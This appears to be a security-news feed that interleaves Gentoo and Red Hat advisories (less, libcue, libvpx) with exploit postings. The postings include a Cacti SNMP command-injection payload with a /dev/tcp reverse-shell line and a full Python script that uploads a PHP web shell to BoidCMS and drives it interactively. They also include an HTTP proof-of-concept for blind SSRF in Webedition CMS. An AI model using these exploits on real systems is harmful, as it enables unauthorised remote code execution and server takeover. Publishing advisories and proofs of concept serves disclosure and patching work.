Gentoo Linux Security Advisory 202310-11 - A filtering bypass in less may allow denial of service. Versions greater than or equal to 608-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: less: Denial service  
     Date: October 10, 2023  
     Bugs: #893530  
       ID: 202310-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A filtering bypass in less may allow denial of service.

Background  
==========

less is a pager and text file viewer.

Affected packages  
=================

Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-apps/less  < 608-r2      >= 608-r2

Description  
===========

less suffered from a flaw in its terminal escape sequence handling which  
made its filtering incomplete.

Impact  
======

Malicious input could clear the terminal output or otherwise manipulate  
it with faked interactions.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All less users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/less-608-r2"

References  
==========

[ 1 ] CVE-2022-46663  
      https://nvd.nist.gov/vuln/detail/CVE-2022-46663

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-11

Cacti version 1.2.24 authenticated command injection exploit that uses SNMP options.

    # Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options# Date: 2023-07-03# Exploit Author: Antonio Francesco Sardella# Vendor Homepage: https://www.cacti.net/# Software Link: https://www.cacti.net/info/downloads# Version: Cacti 1.2.24# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container# CVE: CVE-2023-39362# Category: WebApps# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application# Vulnerability discovered and reported by: Antonio Francesco Sardella=======================================================================================Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)=======================================================================================-----------------Executive Summary-----------------In Cacti 1.2.24, under certain conditions, an authenticated privileged user, can use a malicious string in the SNMP options of a Device, performing command injection and obtaining remote code execution on the underlying server.-------Exploit-------Prerequisites:    - The attacker is authenticated.    - The privileges of the attacker allow to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".    - A Device that supports SNMP can be used.    - Net-SNMP Graphs can be used.    - snmp module of PHP is not installed.Example of an exploit:    - Go to "Console" > "Create" > "New Device".    - Create a Device that supports SNMP version 1 or 2.    - Ensure that the Device has Graphs with one or more templates of:        - "Net-SNMP - Combined SCSI Disk Bytes"        - "Net-SNMP - Combined SCSI Disk I/O"        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:        public\' ; touch /tmp/m3ssap0 ; \'    - Click the "Create" button.    - Check under /tmp the presence of the created file.To obtain a reverse shell, a payload like the following can be used.    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'A similar exploit can be used editing an existing Device, with the same prerequisites, and waiting for the poller to run. It could be necessary to change the content of the "Downed Device Detection" field under the "Availability/Reachability Options" section with an item that doesn't involve SNMP (because the malicious payload could break the interaction with the host).----------Root Cause----------A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).----------References----------    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application

Cacti 1.2.24 Command Injection

Gentoo Linux Security Advisory 202310-10 - A vulnerability has been discovered in libcue which could allow for arbitrary code execution. Versions greater than or equal to 2.2.1-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202310-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: libcue: Arbitrary Code Execution  
     Date: October 10, 2023  
     Bugs: #915500  
       ID: 202310-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability has been discovered in libcue which could allow for  
arbitrary code execution.

Background  
==========

libcue is a CUE Sheet Parser Library.

Affected packages  
=================

Package            Vulnerable    Unaffected  
-----------------  ------------  ------------  
media-libs/libcue  < 2.2.1-r1    >= 2.2.1-r1

Description  
===========

libcue does not check bounds in a loop and suffers from an integer  
overflow flaw which can be exploited to take over the program.

Impact  
======

Untrusted CUE sheet files can lead to arbitrary code execution.

app-misc/tracker-miners[cue] uses libcue to index CUE Sheet files in  
directories. It is possible that downloading a malicious CUE Sheet file  
into a directory indexed by tracker-miners could lead to remote code  
execution.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All libcue users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=media-libs/libcue-2.2.1-r1"

References  
==========

[ 1 ] CVE-2023-43641  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43641

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202310-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2023 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202310-10

BoidCMS versions 2.0.0 and below suffer from a remote shell upload vulnerability.

    #!/usr/bin/python3# Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability# Date: 08/21/2023# Exploit Author: 1337kid# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://boidcms.github.io/BoidCMS.zip# Version: <= 2.0.0# Tested on: Ubuntu# CVE : CVE-2023-38836import requestsimport reimport argparseparser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')parser.add_argument("-u", "--url", help="website url")parser.add_argument("-l", "--user", help="admin username")parser.add_argument("-p", "--passwd", help="admin password")args = parser.parse_args()base_url=args.urluser=args.userpasswd=args.passwddef showhelp():  print(parser.print_help())  exit()if base_url == None: showhelp()elif user == None: showhelp()elif passwd == None: showhelp()with requests.Session() as s:  req=s.get(f'{base_url}/admin')  token=re.findall('[a-z0-9]{64}',req.text)  form_login_data={    "username":user,    "password":passwd,    "login":"Login",  }  form_login_data['token']=token  s.post(f'{base_url}/admin',data=form_login_data)  #=========== File upload to RCE  req=s.get(f'{base_url}/admin?page=media')  token=re.findall('[a-z0-9]{64}',req.text)  form_upld_data={    "token":token,    "upload":"Upload"  }  #==== php shell  php_code=['GIF89a;\n','<?php system($_GET["cmd"]) ?>']  with open('shell.php','w') as f:    f.writelines(php_code)  #====  file = {'file' : open('shell.php','rb')}  s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)  req=s.get(f'{base_url}/media/shell.php')  if req.status_code == '404':    print("Upload failed")    exit()  print(f'Shell uploaded to "{base_url}/media/shell.php"')  while 1:    cmd=input("cmd >> ")    if cmd=='exit': exit()    req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})    print(req.text)

BoidCMS 2.0.0 Shell Upload

Red Hat Security Advisory 2023-5538-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5538-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5538  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
libvpx-1.7.0-10.el8_6.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_6.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_6.i686.rpm  
libvpx-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_6.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_6.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_6.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_6.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_6.s390x.rpm  
libvpx-devel-1.7.0-10.el8_6.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_6.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_6.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_6.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_6.i686.rpm  
libvpx-devel-1.7.0-10.el8_6.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvgAAoJENzjgjWX9erEvkwP/30BCaL+HmyVp7332j2cpmqQ  
hOYjiHO3vT31sJZ1mn+EKzNNXKqL70D93SJyPOAc3cJGPYF58HTszil1gAQ+w6pk  
1kOAB1/baFHJ0GFWGXCfDXIVPMSTSOxk5yu8GpSxU6rcpP1VAJuw2ECzFYbcpnRA  
jeOvWnpqSiO6wLbv5sTd/Pn1Pbxv3GTdhyUbKJ2cLoJphn72Qw6NHAVPIgd3hpnP  
XT2E/er3QkLFC6vBvutyslj4mayhkILnwiRYRnBLgYIWKP/4wGcWf7BpqH7meqIL  
shHIAnaslGdxXDDL6f9OnqyisdHNNw6f23sNQUE12pdWfL/dn5Ll7fgVK6aVENUQ  
OgHajCjTiXKtchwAGLQrLG6ixXs5y8cRc/rIXWg8Hif982xxoiQfrkIYxLWaKgo4  
sMvvx6YdllQJAk3NabGG2zssv2KbAOy0s8o4AFlkiH+VaORx3XujJfZH5P/lkNAr  
EXF0Sw4RgBpDpG+l0qoDVmBmWYWIMup410ZfaVPPCWaqWH8Lce1f4UBK7Ump8jqM  
NLbw1W4qvKlGLleld/BSPNO80Ndv61zLEt8mBIG3ekzDHU+PKFFb23WgqsJbEcq/  
JOttoseX7aLNodLROUe/sRPZ+hzN0YMCKaJlOni71xdKiz/2vzldqslx/igtYOwn  
qWDfQ0JQIrk6IgmJXYvE  
=x93p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5538-01

Red Hat Security Advisory 2023-5539-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5539  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
libvpx-1.9.0-7.el9_2.src.rpm

aarch64:  
libvpx-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-1.9.0-7.el9_2.s390x.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-1.9.0-7.el9_2.i686.rpm  
libvpx-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 9):

aarch64:  
libvpx-debuginfo-1.9.0-7.el9_2.aarch64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.aarch64.rpm  
libvpx-devel-1.9.0-7.el9_2.aarch64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-debugsource-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-devel-1.9.0-7.el9_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.9.0-7.el9_2.s390x.rpm  
libvpx-debugsource-1.9.0-7.el9_2.s390x.rpm  
libvpx-devel-1.9.0-7.el9_2.s390x.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.s390x.rpm

x86_64:  
libvpx-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-debuginfo-1.9.0-7.el9_2.x86_64.rpm  
libvpx-debugsource-1.9.0-7.el9_2.i686.rpm  
libvpx-debugsource-1.9.0-7.el9_2.x86_64.rpm  
libvpx-devel-1.9.0-7.el9_2.i686.rpm  
libvpx-devel-1.9.0-7.el9_2.x86_64.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.i686.rpm  
libvpx-utils-debuginfo-1.9.0-7.el9_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erEHmkP/j76TS36r/5pmVKxp+KznrJ2  
B60LOzDV21Hhca6NRy/moHcSIfQEkty0fxWBQ8HqNrZ0mQRZNNFz1hOXZ097eH6B  
v9fRdFMeyqT5PFpPjU5y+gmyxt43ZCh7LEPBQvMGDCnkW4M8NUbE0y9uxjMiAe19  
3zDDcLA+ssy7Z3K594ICHtuk5Rx8a5iIpRUbf63BBRTRlSPzsQ54FBi3zMSXIYDF  
lMcXbTHq8ysjjrUNDHag89Kg2Xt4XXoC9+W+E1PFqfnlZBzYttXb25yiJJfkvp9k  
s6AlYqjdQ0XHBpdiImuzknplOTFNIGfXePGM8cCqK5P752dmhg10RotbKNRCP8sj  
r/nlCUyXIV0RuFw6qDC0NFzxfXo8K/VUolHToa8BfxB+CzX+evRLDkCKJmEJv3wo  
/rt/W9lzALtXEwK+XqPs9pP/I9zRUXeaFocBKUaK8Mugiun8wwZfB5+sowa18+7V  
8Y22YmtASXuAHhPPCRa1+UWpmzEwXRQMVnQcZSZfLadBJ141lJhMlwwoxbNNz+dj  
OBERh/JYwxBLWK80wmYjUa0751umz+P8UxrqEeA0OCpZ5Zt+GG9gMbVRIeYgP1kO  
LH4h27uhhRBDZ9rRnu3h7FWezeBvRRMwsCrElyEbQa/47aCmpOFIwqdiYwN26SCF  
YMobQwgofyBKFBn5GBId  
=/LcT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5539-01

Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

Red Hat Security Advisory 2023-5534-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5534-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5534  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

ppc64le:  
libvpx-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debugsource-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.ppc64le.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erE5MwP/3TdlO7HiAnGJ45p1iFOMXLM  
5GFa9+26vPJhvWj/NRhcd1VCSc+bPqTVehX30TZBaa9fQOKxR2OeU5o/MVijpMvh  
FV7zLc9VMVx7AG6v3fmQ2zzqgONn5l2G/6dUaVfCJ70NXb5oj3sViPNZud0MSwGa  
H+smKKCIlsySoRri2ujipY79cB8HsBpGHsj939bNJ3d/gRuqksboxsRwuAMgwIMU  
bupdSx7PBNlhLB/hoTkvLRFIqi+xyHe+VdDTGz9RFdjpTtDbGzmeD8kOxR6S0Kbi  
84FtciojYSoxY6iSaiI7LKDenRYnbFUMr6jmcDhVH2rurJdY1ztMi2SYLXJnEwoi  
1Br1WocqgsV0HQHTIZhVY/r6pDuAC2difmZ2LZgYLUCmf0MWMjv4kn30mMwdPsJ7  
V+V72BIy5BN/ATvTggnprHXMxL17WfA0bbQMbJ+UG+Vq0kubfSMjn12nrEVTxVsc  
78tfFQN+ONUTOUFcr8uo5bs2t/PY0Jkb+Tguim0JqPeUqjkeDM/upA9OwyQSEr3S  
SYAbL00ia9ZvlyURm499xDZE87fJR6Jbs1ibXRawxZWWGIfYZX0VjOV0Yd+k2EGk  
iUX/z5hiTReb0TIekiciGYr+UhaVbZJNWbLruOzPh7UQ+RbF0NAmbIOUHPuY+iXK  
KXSj7YDnAe/TEyenfuKC  
=zUAg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5534-01

